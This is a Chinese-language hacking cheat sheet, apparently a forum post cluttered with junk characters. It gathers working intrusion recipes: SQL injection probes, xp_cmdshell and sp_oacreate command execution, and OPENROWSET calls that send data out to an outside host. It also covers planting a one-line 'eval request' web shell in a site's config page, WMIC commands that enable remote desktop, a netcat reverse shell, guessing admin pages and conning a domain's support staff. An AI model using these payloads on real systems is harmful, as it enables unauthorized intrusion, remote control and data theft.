SA点数据库分离技术相关. \8 E- i) T% w; D1 _* }
, O* ?& e+ p; N `8 `' z4 G+ e) b- ~' P; i) ^( E1 r
SA点数据库分离搞法+语句:/ s+ |6 v' n) q: S! _9 l
4 U4 a/ Z: `/ }; B5 t! p
注射点不显错,执行下面三条语句页面都返回正常。8 H- w6 h/ E% K4 f6 c/ L4 W
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
9 f2 X% N: k/ ~6 \, r1 zand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
]* b1 K5 b- y' c- qand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
2 T- J% {. \" C* j9 W( v可以列目录,判断系统为2000,web与数据库分离
: a M y0 e+ b) f1 u6 P: X3 R遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。8 G/ ]6 F7 G \) U$ I: k. u0 | {
在注射点上执行' P% Z. e: f3 z, G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--- m% Y( U/ L. _/ Q2 w
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
/ o% Y' T' y- N: R7 b6 q' r2 }( r还有我用NC监听得其他端口都没有得到IP。
5 R4 d/ a A$ h+ G9 S
( z7 y0 H& P5 X G通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
( e' \! M: z! p'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
1 \. o, k7 D# H9 p& ]" q5 m$ V4 x4 y+ E) y) e/ Q$ I/ R+ e
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
# y; A' k! f# \5 x3 |1 }7 Q
1 Z0 Z% _- G# p* c! ^# Z% C现在就猜想是不是数据库是内网而且不能连外网。7 S0 D) [# x3 v% j# ]7 j
- A( c. h, B: ~0 Q( t! c. Q L4 L! W$ w. X
access导出txt文本代码
2 x+ A x( Q# T; QSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
3 C, w: N: U: |4 }
4 V! a5 b; E9 ^, w, |, c+ I8 W2 Z0 m$ h# _. l
9 N3 _; e/ a5 X$ N/ v& k+ ]
自动跳转到指定网站代码头2 U% D+ G7 p6 `4 X' V' E" e7 @8 F
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
+ H3 |* t" D* ?: n
; v+ g8 j+ s$ m/ }2 A9 \
. g+ m( g: z1 O入侵java or jsp站点时默认配置文件路径:3 i! P5 s% v Q- W
\web-inf\web.xml2 e; M9 f' A9 M1 z# i6 I
tomcat下的配置文件位置:
8 ~1 X* o$ O" J8 y6 M' S) E+ z' [\conf\server.xml (前面加上tomcat路径)
. N. k/ \4 R* l3 C, S% x\Tomcat 5.0\webapps\root\web-inf\struts-config.xml* }, D1 W3 J; V" K
+ {/ h* U- J. M& ] q7 B1 z, N! O' e' B/ C1 M6 U) ?
3 \ n* Z- b. u2 S- [检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
: A! x( k7 o3 g1 c& r, z1 b% o: L/ @6 X-1%236 b+ L: e+ q! \3 \3 |4 g
>
4 O4 `; b- M2 D; o$ B$ \9 {<
% n& X @% x( c1'+or+'1'='1
! m" H" h8 |* n+ A7 F, `id=8%bf
* W+ ^ S; U1 ~; R8 U% @ D6 \$ E- n: U4 ~( k$ \4 ^
全新注入点检测试法:
/ y. m% ^* p6 ]8 G* F# r在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。5 B5 U( \4 x5 D3 f
: c) E* ~0 e1 P4 o5 v% e
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。) R' E' z3 F$ m
* }3 [: h" \8 H; I' `" |+ i6 a y搜索型注入判断方法:
$ v3 d, P N) @# {7 k& ]0 Y北京%' and '1'='1' and '%'='7 Z0 N! E, W t5 o( h, l
北京%' and '1'='2' and '%'='
# x( _' k- h7 Q
. h+ `9 E. x+ V9 N5 a) y7 Z" x1 W, b+ X/ a, d5 ?' v; i% c9 n
COOKIES注入:6 p0 [: W* p+ p4 y) B
# e; a5 i/ G1 w" g1 e
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
5 L1 |: i% F1 K( l0 f0 Y# r/ O' z6 t. J
2000专业版查看本地登录用户命令:4 {/ K- z8 @/ @
net config workstation' {; d" W$ G4 V2 Q
2 p5 ]8 P* K# _$ _3 q, F
6 v! F2 ?& U a2 `. K; E2003下查看ipsec配置和默认防火墙配置命令:
. v% R# P5 |6 f) @netsh firewall show config
2 p; F/ Q) e enetsh ipsec static show all) W7 r0 ]: A- R' U, q! c
" Z1 ?& S7 B* c$ ~, {( T n9 z不指派指定策略命令:
0 y& N: w' w( N; R+ ]. E! h4 Nnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
& u3 ?+ U( A! N( I- l9 A( Nnetsh ipsec static show policy all 显示策略名% c2 \4 k1 O% _4 r! r
6 [& }% N: {8 [; N
) @# t2 Y- T1 n! ?" |0 k猜管理员后台小技巧:
9 G0 I; `2 G( M1 m0 F& \# e& ladmin/left.asp
) G0 O* R/ g m% c7 yadmin/main.asp3 i) v J8 r2 S' ?) ]$ K0 R
admin/top.asp
, s0 s# B& ]6 a2 a0 kadmin/admin.asp 6 @2 i/ r. l) E! d i o
会现出菜单导航,然后迅雷下载全部链接) e$ {2 n3 @$ \$ a
& j% c/ g4 F: v8 w {
* K" s% n% |" k
社会工程学:
1 m- q, x. x+ f用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
( D: c0 R" u6 w& E然后去骗客服) }, X/ u! X P7 k( h8 {
& ]$ L' @9 [4 q* z' a# x; D
+ w* b& F* q0 Y) r+ k8 y% T统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
6 l; x7 j: b, t; K& `0 |$ j查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, / [; `. y5 v" B; Q
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
8 \& Q8 J7 u% Y! q( u/ ^) S& m5 d' M" L
2 l- y; a2 x, ]3 t. @- n- ^
) F0 \. R' _; h7 |( {4 r6 h* H6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)# B4 z: ]% M0 J$ y* K
4 c4 j8 g ?6 f, \
& k) [7 k$ W$ o2 S% ?
. O$ k! ^7 ^( o! e* r. bCMD加密注册表位置) X) _- E7 ^* y( ~
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor# c( N, Y' H' { v' K1 }2 ]
AutoRun" A1 V% w P" A
; @8 W; o9 ^! ~0 T% o/ R
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
; F, X4 S g- C# x; EAutoRun
% y* [: S! a5 d% u% d) q
8 h+ X9 q4 X$ L7 g3 Q) P \3 w9 V6 q) n0 E! ~5 p
在找注入时搜索Hidden,把他改成test
" b. z2 ]2 Z4 W5 t D
$ e" K. n1 e* f( Z& m. x
, A) J. ^) X Q; E- n
1 S! `6 i) C0 t. ^mstsc /v:IP /console
5 ?6 J! U( w B) G3 J7 n8 L
/ }5 v: [. f4 j8 T# c1 w0 _- w* B* ~3 G& F1 @0 I
一句话开3389:
4 F* B. H' J2 @! @3 I0 P4 {6 \- J# ~& J4 E
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
: W e, K$ b' |. ?$ ]开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.) K0 M5 u* V3 l, G! @; I8 N
7 p: G& ^4 T, `& b: B' F; c1 m
' ]! w3 x0 ^; V
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
; E6 q6 D* J( r9 f: R6 J$ XInsert into admin(user,pwd) values('test','test')
' [# w# O: V) _' w H( }" U4 O& C8 w
- k4 a9 m- I* p" ~3 h2 E
8 z- { Q% x- E' I/ dNC反弹4 n7 N; _/ h0 c5 _& S% g8 |
先在本机执行: nc -vv -lp 监听的端口 (自己执行) , h" a: M4 J( {* w; N; A
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
4 w, i5 N# A3 m9 B9 W- ~0 X3 M1 {2 Y8 R* z7 q
7 i. H/ P. V4 q& T0 ]9 }0 H在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
4 A8 C0 R) }$ ]: n( z" ^( U8 g: Z' c2 b' D- p* k, _
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录% Q% p; i: R# |. L' L( e
例如:2 Y6 H$ m4 H& O8 Q1 R8 Q3 E& M
subst k: d:\www\ 用d盘www目录替代k盘
/ @" ` M( q9 A( D! F* X' `$ Csubst k: /d 解除K盘代替 |